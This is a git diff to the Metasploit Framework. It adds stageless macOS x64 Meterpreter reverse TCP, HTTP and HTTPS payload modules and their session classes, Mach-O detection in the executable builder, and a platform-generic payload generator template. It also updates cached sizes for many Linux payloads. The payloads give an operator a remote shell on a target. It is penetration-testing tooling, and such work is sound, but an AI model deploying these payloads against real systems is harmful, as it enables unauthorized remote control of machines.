diff --git a/Gemfile.lock b/Gemfile.lock index b0ad333b5b27..ba7dbd295d07 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -30,7 +30,7 @@ PATH metasploit-model metasploit-payloads (= 1.2.37) metasploit_data_models - metasploit_payloads-mettle (= 0.1.10) + metasploit_payloads-mettle (= 0.1.14) msgpack nessus_rest net-ssh @@ -189,7 +189,7 @@ GEM postgres_ext railties (~> 4.2.6) recog (~> 2.0) - metasploit_payloads-mettle (0.1.10) + metasploit_payloads-mettle (0.1.14) method_source (0.8.2) mini_portile2 (2.2.0) minitest (5.10.2) diff --git a/lib/msf/base/sessions/meterpreter_x64_osx.rb b/lib/msf/base/sessions/meterpreter_x64_osx.rb new file mode 100644 index 000000000000..2e507e90550b --- /dev/null +++ b/lib/msf/base/sessions/meterpreter_x64_osx.rb @@ -0,0 +1,29 @@ +# -*- coding: binary -*- + +require 'msf/base/sessions/meterpreter' + +module Msf +module Sessions + +### +# +# This class creates a platform-specific meterpreter session type +# +### +class Meterpreter_x64_OSX < Msf::Sessions::Meterpreter + def supports_ssl? + false + end + def supports_zlib? + false + end + def initialize(rstream, opts={}) + super + self.base_platform = 'osx' + self.base_arch = ARCH_X64 + end +end + +end +end + diff --git a/lib/msf/base/sessions/meterpreter_x86_osx.rb b/lib/msf/base/sessions/meterpreter_x86_osx.rb new file mode 100644 index 000000000000..c7e25efac942 --- /dev/null +++ b/lib/msf/base/sessions/meterpreter_x86_osx.rb @@ -0,0 +1,29 @@ +# -*- coding: binary -*- + +require 'msf/base/sessions/meterpreter' + +module Msf +module Sessions + +### +# +# This class creates a platform-specific meterpreter session type +# +### +class Meterpreter_x86_OSX < Msf::Sessions::Meterpreter + def supports_ssl? + false + end + def supports_zlib? + false + end + def initialize(rstream, opts={}) + super + self.base_platform = 'osx' + self.base_arch = ARCH_X86 + end +end + +end +end + diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 9516e3ac6a9d..279d249a0ab5 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -106,7 +106,7 @@ def self.to_zip(files) # @return [String] # @return [NilClass] def self.to_executable(framework, arch, plat, code = '', opts = {}) - if elf? code + if elf? code or macho? code return code end @@ -2148,15 +2148,19 @@ def self.to_executable_fmt(framework, arch, plat, code, fmt, exeopts) end end when 'macho', 'osx-app' - macho = case arch - when ARCH_X86,nil - to_osx_x86_macho(framework, code, exeopts) - when ARCH_X64 - to_osx_x64_macho(framework, code, exeopts) - when ARCH_ARMLE - to_osx_arm_macho(framework, code, exeopts) - when ARCH_PPC - to_osx_ppc_macho(framework, code, exeopts) + if macho? code + macho = code + else + macho = case arch + when ARCH_X86,nil + to_osx_x86_macho(framework, code, exeopts) + when ARCH_X64 + to_osx_x64_macho(framework, code, exeopts) + when ARCH_ARMLE + to_osx_arm_macho(framework, code, exeopts) + when ARCH_PPC + to_osx_ppc_macho(framework, code, exeopts) + end end fmt == 'osx-app' ? Msf::Util::EXE.to_osx_app(macho) : macho when 'vba' @@ -2284,6 +2288,10 @@ def self.elf?(code) code[0..3] == "\x7FELF" end + def self.macho?(code) + code[0..3] == "\xCF\xFA\xED\xFE" || code[0..3] == "\xCE\xFA\xED\xFE" || code[0..3] == "\xCA\xFE\xBA\xBE" + end + end end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index 1933f869e971..4e9e0079b266 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -259,7 +259,7 @@ def cmd_shell(*args) print_error( "Failed to spawn shell with thread impersonation. Retrying without it." ) cmd_execute("-f", path, "-c", "-H", "-i") end - when 'linux' + when 'linux', 'osx' # Don't expand_path() this because it's literal anyway path = "/bin/sh" cmd_execute("-f", path, "-c", "-i") diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index f4e586e7986e..68cdb6e9245d 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -72,7 +72,7 @@ Gem::Specification.new do |spec| # Needed for Meterpreter spec.add_runtime_dependency 'metasploit-payloads', '1.2.37' # Needed for the next-generation POSIX Meterpreter - spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.10' + spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.14' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb index fe533ba2e2a4..17b86565e019 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 652264 + CachedSize = 675048 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb index b7ec5eaf2304..912276538071 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 652264 + CachedSize = 675048 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb index 8f52504dbb9e..f407e0daf0e0 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 652264 + CachedSize = 675048 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb index efd415b4f84c..6c876d1bee4b 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 645136 + CachedSize = 668360 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb index 8f1e1ee119c4..b77e2f7c23a5 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 645136 + CachedSize = 668360 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb index ff65f14f9e9f..3bd0c0e77de0 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 645136 + CachedSize = 668360 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb index 54bd7d06c7e7..e643614ecfb3 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 643904 + CachedSize = 666624 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb index c8c58653c90d..0c07ad94cfb2 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 643904 + CachedSize = 666624 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb index a156cecc4b6e..51db411ca4b1 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 643904 + CachedSize = 666624 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb index 1316f50c33b6..a09f014fde7d 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1028600 + CachedSize = 1059232 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb index ee2989048afb..5abfa80bc923 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1028600 + CachedSize = 1059232 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb index bf4087480495..f468ddbadaae 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1028600 + CachedSize = 1059232 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index dd52bbdcb134..50d9bf8fd435 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1007024 + CachedSize = 1037012 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index c77c364f8ea6..c061ad76039e 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1007024 + CachedSize = 1037012 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index 7484609efa9f..af9d102c5000 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1007024 + CachedSize = 1037012 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb index 0c9523f14b6a..e458dea19c22 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1007120 + CachedSize = 1036276 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb index 4ccc63a1b8e4..c4909660cdc5 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1007120 + CachedSize = 1036276 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb index 80f10850367f..e713c3d24bee 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 1007120 + CachedSize = 1036276 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb index 884f95a9e432..13eb0ba7af9c 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 789100 + CachedSize = 789164 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb index 5d26e63a253a..a09a19a99cd6 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 789100 + CachedSize = 789164 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb index 84c45966ce9d..157791c38f4f 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 789100 + CachedSize = 789164 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb index 251f57fa6a55..b6e36369ca87 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 790264 + CachedSize = 855864 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb index 92af2311c424..c9a316920db9 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 790264 + CachedSize = 855864 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb index 1e7f8aa3b751..ffb57406a205 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 790264 + CachedSize = 855864 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb index 18f404a24730..1b8616e199fa 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 704512 + CachedSize = 729120 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb index c0f52dbf15db..0a39b3bc0b9e 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 704512 + CachedSize = 729120 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb index e25a8a17f494..a570d615ae07 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 704512 + CachedSize = 729120 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb index 3b829a34eac9..37ceede91fee 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 744060 + CachedSize = 772796 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb index 0aaaa207df61..829b48db4f4a 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 744060 + CachedSize = 772796 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb index 467fc900fb2e..9117fdcca985 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 744060 + CachedSize = 772796 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb index c00ef067ae1d..c5fa02fd76ed 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 868848 + CachedSize = 893496 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb index 22b5d30a1b14..97c407564038 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 868848 + CachedSize = 893496 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb index 8da93cb5f79c..423e829dd35e 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 868848 + CachedSize = 893496 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb new file mode 100644 index 000000000000..0bb2dace76ec --- /dev/null +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb @@ -0,0 +1,45 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_http' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_x64_osx' + +module MetasploitModule + + CachedSize = 618316 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'OSX Meterpreter, Reverse HTTP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'osx', + 'Arch' => ARCH_X64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttp, + 'Session' => Msf::Sessions::Meterpreter_x64_OSX + ) + ) + end + + def generate + opts = { + scheme: 'http', + stageless: true + } + MetasploitPayloads::Mettle.new('x86_64-apple-darwin', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb new file mode 100644 index 000000000000..2f080499766c --- /dev/null +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb @@ -0,0 +1,45 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_x64_osx' + +module MetasploitModule + + CachedSize = 618316 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'OSX Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'osx', + 'Arch' => ARCH_X64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_x64_OSX + ) + ) + end + + def generate + opts = { + scheme: 'https', + stageless: true + } + MetasploitPayloads::Mettle.new('x86_64-apple-darwin', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb new file mode 100644 index 000000000000..43070ef0ae55 --- /dev/null +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb @@ -0,0 +1,45 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_x64_osx' + +module MetasploitModule + + CachedSize = 618316 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'OSX Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'osx', + 'Arch' => ARCH_X64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_x64_OSX + ) + ) + end + + def generate + opts = { + scheme: 'tcp', + stageless: true + } + MetasploitPayloads::Mettle.new('x86_64-apple-darwin', generate_config(opts)).to_binary :exec + end +end diff --git a/tools/modules/generate_mettle_payloads.rb b/tools/modules/generate_mettle_payloads.rb index 91d8bbb520a8..967a051b81c3 100755 --- a/tools/modules/generate_mettle_payloads.rb +++ b/tools/modules/generate_mettle_payloads.rb @@ -12,32 +12,36 @@ ] arches = [ - ['aarch64', 'aarch64-linux-musl'], - ['armbe', 'armv5b-linux-musleabi'], - ['armle', 'armv5l-linux-musleabi'], - ['mips64', 'mips64-linux-muslsf'], - ['mipsbe', 'mips-linux-muslsf'], - ['mipsle', 'mipsel-linux-muslsf'], - ['ppc', 'powerpc-linux-muslsf'], - ['ppc64le', 'powerpc64le-linux-musl'], - ['x64', 'x86_64-linux-musl'], - ['x86', 'i486-linux-musl'], - ['zarch', 's390x-linux-musl'], + ['aarch64','Linux', 'aarch64-linux-musl'], + ['armbe', 'Linux', 'armv5b-linux-musleabi'], + ['armle', 'Linux', 'armv5l-linux-musleabi'], + ['mips64', 'Linux', 'mips64-linux-muslsf'], + ['mipsbe', 'Linux', 'mips-linux-muslsf'], + ['mipsle', 'Linux', 'mipsel-linux-muslsf'], + ['ppc', 'Linux', 'powerpc-linux-muslsf'], + ['ppc64le','Linux', 'powerpc64le-linux-musl'], + ['x64', 'Linux', 'x86_64-linux-musl'], + ['x86', 'Linux', 'i486-linux-musl'], + ['zarch', 'Linux', 's390x-linux-musl'], + ['x64', 'OSX', 'x86_64-apple-darwin'], ] arch = '' payload = '' +platform = '' scheme = '' cwd = File::dirname(__FILE__) -template = File::read(File::join(cwd, 'linux_meterpreter_reverse.erb')) -renderer = ERB.new(template) -arches.each do |a, p| +arches.each do |a, pl, pa| schemes.each do |s| arch = a - payload = p + platform = pl + payload = pa scheme = s - filename = File::join('modules', 'payloads', 'singles', 'linux', arch, "meterpreter_reverse_#{scheme}.rb") + + template = File::read(File::join(cwd, "meterpreter_reverse.erb")) + renderer = ERB.new(template) + filename = File::join('modules', 'payloads', 'singles', platform, arch, "meterpreter_reverse_#{scheme}.rb") File::write(filename, renderer.result()) end end diff --git a/tools/modules/linux_meterpreter_reverse.erb b/tools/modules/meterpreter_reverse.erb similarity index 72% rename from tools/modules/linux_meterpreter_reverse.erb rename to tools/modules/meterpreter_reverse.erb index bffd3a8edb17..6ff39341d041 100644 --- a/tools/modules/linux_meterpreter_reverse.erb +++ b/tools/modules/meterpreter_reverse.erb @@ -6,7 +6,7 @@ require 'msf/core/handler/reverse_<%= scheme %>' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' -require 'msf/base/sessions/meterpreter_<%= arch %>_linux' +require 'msf/base/sessions/meterpreter_<%= arch %>_<%= platform.downcase %>' module MetasploitModule @@ -18,23 +18,27 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter, Reverse <%= scheme.upcase %> Inline', + 'Name' => '<%= platform %> Meterpreter, Reverse <%= scheme.upcase %> Inline', 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], - 'Platform' => 'linux', + 'Platform' => '<%= platform.downcase %>', 'Arch' => ARCH_<%= arch.upcase %>, 'License' => MSF_LICENSE, 'Handler' => Msf::Handler::Reverse<%= scheme.capitalize %>, - 'Session' => Msf::Sessions::Meterpreter_<%= arch %>_Linux + 'Session' => Msf::Sessions::Meterpreter_<%= arch %>_<%= platform %> ) ) end def generate - opts = {scheme: '<%= scheme %>'} + opts = { + scheme: '<%= scheme %>', + stageless: true + } MetasploitPayloads::Mettle.new('<%= payload %>', generate_config(opts)).to_binary :exec end end